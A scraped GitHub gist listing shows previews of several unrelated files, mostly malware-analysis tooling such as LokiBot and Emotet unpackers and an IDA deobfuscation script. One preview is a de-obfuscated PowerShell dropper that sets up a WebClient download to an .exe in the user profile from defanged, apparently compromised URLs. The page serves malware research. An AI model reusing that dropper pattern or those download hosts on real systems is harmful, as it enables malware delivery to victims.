MrZyr0
/ Darkreader-custom-theme-styles.css
Created
January 28, 2021 22:03
This is the content of developper window in Dark Reader extension
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| * | |
| INVERT | |
| .jfk-bubble.gtx-bubble | |
| .captcheck_answer_label > input + img | |
| CSS | |
| .vimvixen-hint { | |
| background-color: ${#ffd76e} !important; | |
| border-color: ${#c59d00} !important; |
irshadqemu
/ unpack_3rdstage_lokibot.py
Created
January 4, 2021 10:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| from itertools import cycle | |
| SERVER_RESPONSE_FIE = "server_response.txt" | |
| XOR_KEY = b"ZKkz8PH0" | |
| with open(SERVER_RESPONSE_FIE) as serverfd: | |
| resp_str = serverfd.read() | |
| resp_str = resp_str[::-1] |
irshadqemu
/ de-obfuscated-ps.ps1
Created
November 22, 2020 20:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $jrFhA0='Wf1rHz' | |
| $uUMMLI = '284' | |
| $iBtj49N='ThMqW8s0' | |
| $FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe' | |
| $S9GzRstM='EFCwnlGz' | |
| $u8UAr3=&('new-object') NeT.wEBClIEnt | |
| $pLjBqINE='http[:]//blockchainjoblist[.]com/wp-admin/014080/ | |
| @ https[:]//womenempowermentpakistan[.]com/wp-admin/paba5q52/ | |
| @ https[:]//atnimanvilla[.]com/wp-content/073735/ | |
| @ https[:]//yeuquynhnhai[.]com/upload/41830/ |
irshadqemu
/ unpack_emotet.py
Last active
January 8, 2021 16:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Name: | |
| # unpack_emotet.py | |
| # Description: | |
| # This script accompanies my blog at | |
| # https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/ | |
| # and can be used to statically unpack given sample in the blog | |
| # Author: | |
| # https://twitter.com/mirshadx | |
| # https://www.linkedin.com/in/irshad-muhammad-3020b0a5/ |
Soccolo
/ BalkanMOP2.lean
Last active
July 29, 2021 14:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import data.real.basic | |
| import algebra | |
| import tactic | |
| import algebra.quadratic_discriminant | |
| import algebra.ordered_field | |
| import algebra.ordered_group | |
| import algebra.ordered_ring | |
| open classical | |
| local attribute [instance] prop_decidable |
muff-in
/ resources.md
Last active
October 17, 2024 22:10
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
williballenthin
/ deob_opaque_predicate.py
Created
July 28, 2020 19:58
search for and patch out known opaque predicates within IDA Pro workspaces.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| search for and patch out known opaque predicates within IDA Pro workspaces. | |
| just run the script and it will manipulate the open database. | |
| therefore, you should probably create a backup first. | |
| """ | |
| import logging | |
| from pprint import pprint | |
| import ida_idp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Settings] | |
| Check DLL versions=0 | |
| Show toolbar=1 | |
| Status in toolbar=1 | |
| Use hardware breakpoints to step=0 | |
| Restore windows=2073 | |
| Scroll MDI=0 | |
| Horizontal scroll=0 | |
| Topmost window=0 | |
| Index of default font=1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xcode-select --install | |
| # /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" | |
| brew install b7zip cmake qt5 clang-format zsh mas watch git git-gui graphicsmagick ghostscript npm wget trash composer romkatv/powerlevel10k/powerlevel10k | |
| brew install --cask vscodium vlc qt-creator keka db-browser-for-sqlite | |
| brew install --cask adobe-acrobat-reader teamviewer | |
| pip3 install requests | |
| # pip3 install pandas pyodbc striprtf pathvalidate mysql-connector-python |
NewerOlder